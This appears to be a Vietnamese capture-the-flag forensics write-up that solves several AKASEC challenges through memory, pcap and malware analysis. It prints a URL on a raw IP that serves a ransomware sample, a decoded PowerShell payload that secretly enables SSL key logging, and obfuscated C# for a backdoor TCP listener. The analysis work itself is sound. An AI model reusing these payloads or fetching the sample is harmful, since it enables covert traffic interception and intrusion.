# Portugal  **Giải pháp:** *  Thấy có nhiều tiến trình chrome => Dùng filescan + grep lấy file history xem lịch sử web :  Mình sẽ tiến find `gws-wiz-serp`(1->22) để ghép lại lấy flag **Flag:** `AKASEC{V0L4T1L1TY_f0r_chr0m3_s34rch_h1st0ry}` # Sussy  **Giải pháp:** * Vì mấy bài này không có gì để giải thích nên mình sẽ nói nhanh giải pháp: *  * Kỹ thuật dns exfiltration loại lấy các đoạn hex của giao thức dns về => 1 file zip (crack bằng 7z2john được passwword: `hellokitty`) => Được 1 file pdf (crack tiếp bằng pdf2john đc password: `meow`) => mở ra lấy flag.  # saveme  **Giải pháp:** * Thử thách này cho ta các file sau:  Thấy có 1 file word mình có check thử nhưng file này không dính macro, thử mở file ra xem thì thấy các trang khác đang chứa những mã hex như này:  * Mình thử lấy về replace và decode hex xem: *  Mình được 1 file .exe, tiến hành tải về ném lên virustotal check xem 1 số thông tin:  Có thể thấy có shellcode được load trong file .exe này nhưng khi làm thì mình đã lấy file drop từ shellcode đó từ nguồn từ mục virus của cộng đồng github:  được 1 đường dẫn file : http://20.81.130.178:8080/ransomware.exe Cách 2 làm bằng tay lấy shellcode về nhưng mình lười quá nên cũng chưa làm nữa * Tiến hành tải file ransomware.exe về phân tích hành vi nó thôi: -  - File này được code bằng c# mình sẽ dùng dnspy để phân tích: -  - Phần Chính của đoạn code này nằm trong class b Hành vi của mã độc này là đang thực hiện mã hóa `triple DES` với key là `Lp3jXluuW799rnu4` và iv là biến mảng array(thuộc kiểu byte) thực với input là các file trong thư mục đã được chỉ dẫn và đề cập trên kia => các file ảnh đã bị mã hóa mà mình đã đề cập ảnh ở trên * Bây giờ mình sẽ dùng cyberchef decode từng ảnh và lấy flag thôi:  **Flag:** `AKASEC{F_MiCRoSft_777}` # Sharing Is Not Caring  **Giải pháp:** * Thử thách cho mình 1 file disk và 1 file .pcap mình sẽ dùng wireshark để xem các gói tin mạng trước: * Check ở stream thứ nhất thấy được:  Tải xuống 1 file `free ram.exe` ở đường dẫn trên nhưng vì file này download của giao thức https nên là không có sự hiện diện của gói tin trên này và mình có paste thử link đó lên gg nhưng đã bị chặn * Hết cách mình sẽ vào file disk kia tìm kiếm xem thử có manh mối gì không:  Ta thấy có 1 đường dẫn khác để tải file `free ram.exe`(dính malware), tiến hành tải về load vào ida phân tích xem:  Vào phần `string` thấy có 1 chuỗi base64 nên mình sẽ dùng strings + grep file .exe này xem chi tiết hơn:  Ta có được đoạn mã này * Bây sẽ sẽ reverse lại và decode base64 xem hành vi nó là gì:  ``` $sslKeyLogFile = "C:\Users\Public\Documents\Internet Explorer\SIGNUP\ink\sslkey.log" if (-not (Test-Path $sslKeyLogFile)) { New-Item -Path $sslKeyLogFile -ItemType File } [System.Environment]::SetEnvironmentVariable('SSLKEYLOGFILE', $sslKeyLogFile, 'Machine') Write-Error "sorry for technical issue. no ram can be boosted" ``` Đại khái Đoạn mã trên chủ yếu nhằm thiết lập một tệp log để lưu trữ các khóa SSL và thiết lập biến môi trường liên quan. * Ý tưởng bây giờ mình sẽ vào đường dẫn trên để lấy file `sslkey.log` về và load vào wireshark để có thể xem các giao thức http bị khóa(vì mình cũng đã check thấy có rất nhiều gói tin http bị khóa nên cũng rất là nghi đến trường hợp này rồi) * Mình sẽ load key vào file và check các trường `DATA` trong giao thức http đã bị khóa và lấy flag thôi:  **Flag:** `AKASEC{B4s1c_M4lw4r3_4nd_PC4P_4n4lys1s}` # Snooz  **Giải pháp:** * Challenge này trong lúc diễn ra giải thì mình chỉ tìm được pastecode. * Thử thách này người ta mình 1 file .mem và 1 file .pcap, mình sẽ đi phân tích file pcap xem sao:  Có thể thấy victim tiến hành tải về 1 file rất khả nghi, mình sẽ lấy về decode xem được gì nào:  Được 1 file .exe, quăng lên virustotal để check một số thông tin  File này được viết bằng c# nên mình sẽ phân tích bằng dnspy: ```csharp internal class a { // Token: 0x06000004 RID: 4 RVA: 0x000021CC File Offset: 0x000003CC private static void a() { TcpListener tcpListener = new TcpListener(IPAddress.Any, 1337); <Module>.l = -1592258590; TcpListener tcpListener2 = tcpListener; object obj = null; object e = 1386028750; <Module>.o = 2136656571; <Module>.e = e; <Module>.a = obj; tcpListener2.Start(); bool flag; <Module>.h = flag; for (;;) { flag = true; <Module>.k = 1987339265; <Module>.a = null; <Module>.g = flag; int num; <Module>.p = num; <Module>.r = -1051365525; NetworkStream stream; global::b.a = stream; TcpClient tcpClient = tcpListener.AcceptTcpClient(); <Module>.i = 1057425350; stream = tcpClient.GetStream(); byte[] array = new byte[1024]; <Module>.e = null; byte[] array2 = array; <Module>.i = -1411494653; Stream stream2 = stream; byte[] buffer = array2; int offset = 0; <Module>.k = 1657774894; <Module>.q = 744302617; num = stream2.Read(buffer, offset, array2.Length); byte[] array3 = new byte[num]; Array sourceArray = array2;.................... ..... private static byte[] b(byte[] A_0, string A_1) { Aes aes = Aes.Create(); byte[] result; try { <Module>.i = 2081625616; SymmetricAlgorithm symmetricAlgorithm = aes; Encoding utf = Encoding.UTF8; int r = -1871252905; <Module>.m = -1437277352; <Module>.r = r; symmetricAlgorithm.Key = utf.GetBytes(A_1); SymmetricAlgorithm symmetricAlgorithm2 = aes; CipherMode mode = CipherMode.ECB; <Module>.q = -1852116043; <Module>.e = null; symmetricAlgorithm2.Mode = mode; <Module>.l = -1410905245; ICryptoTransform cryptoTransform; object c = cryptoTransform; <Module>.k = 1845842485; <Module>.c = c; SymmetricAlgorithm symmetricAlgorithm3 = aes; PaddingMode padding = PaddingMode.None; object h = null; <Module>.b = null; <Module>.h = h; object d = <Module>.c(Type.EmptyTypes.Length + 8801, sizeof(uint) + 9765, sizeof(float) + 89); bool flag; <Module>.d = flag; <Module>.d = d; symmetricAlgorithm3.Padding = padding; <Module>.i = 1308380089; ICryptoTransform cryptoTransform2 = aes.CreateDecryptor(); <Module>.m = -1557401652; cryptoTransform = cryptoTransform2; private const int a = 1337; // Token: 0x04000014 RID: 20 private const string b = "fr33___p4l3571n3"; ``` * Hành vi chính của đoạn code này sẽ nằm trong class a, nói sơ quá hành vi được code này là: - Ban đầu thiết lại 1 giao thức tcp với port 1337 và ip là của victim , xuống bên dưới là mã hóa aes-ecb nhằm để attacker gửi thông tin đã bị mã hóa qua ip và port được thiết lập của victim - Key : `fr33___p4l3571n3` - Mình sẽ filter các giao thức có port 1337 để dữ liệu đã bị mã hóa mà attacker đã gửi cho victim là gì: -  * Mình sẽ dùng cyberchef để decode:  `Got the new pass to open the pastecode. It's 5n00zm3m3rbr0z now. Ditch the old one. Keep it on the down-low.` * Ban đầu thi mình đã check file mem xem thì có khá nhiều tiến trình trình duyệt nhưng khi dump về xem thì không có gì đặc biệt nên là mình sẽ chuyển hướng sang đi tìm link pastecode mình sẽ dùng strings + grep file mem với keyword là `pastecode`:  https://pastecode.io/s/9oz9u9h4 * Vào đường dẫn trên và dùng pastecode là `5n00zm3m3rbr0z` để có thể mở khóa: *  Tải về nhưng yêu cầu có mật khẩu mình thử bruteforce nhưng không được, nên bây giờ sẽ tiếp tục phân tích tiến trình của file mem: dg * Thấy có tiến trình `notepad.exe` trông khả nghi nên mình sẽ dump về xem sao - Lúc đầu mình đã dùng strings + grep nhưng thấy không khả quan lắm nên mình sẽ dùng tool `GIMP` để chỉnh xem author có ghi gì trên đó không: -  Sau một hồi lâu chính thì đây là password của file zip : `Samaqlo@Akasex777`  Nhưng mà mở ra không thấy gì cả kể cả dùng strings ,cat, exiftool ... vẫn không thấy gì * Sau khi mò một xíu thì mình có 1 tool stegseek để lấy flag được giấu trong đó: *  **Flag:** `AKASEC{05-10-2023_free_palestine}`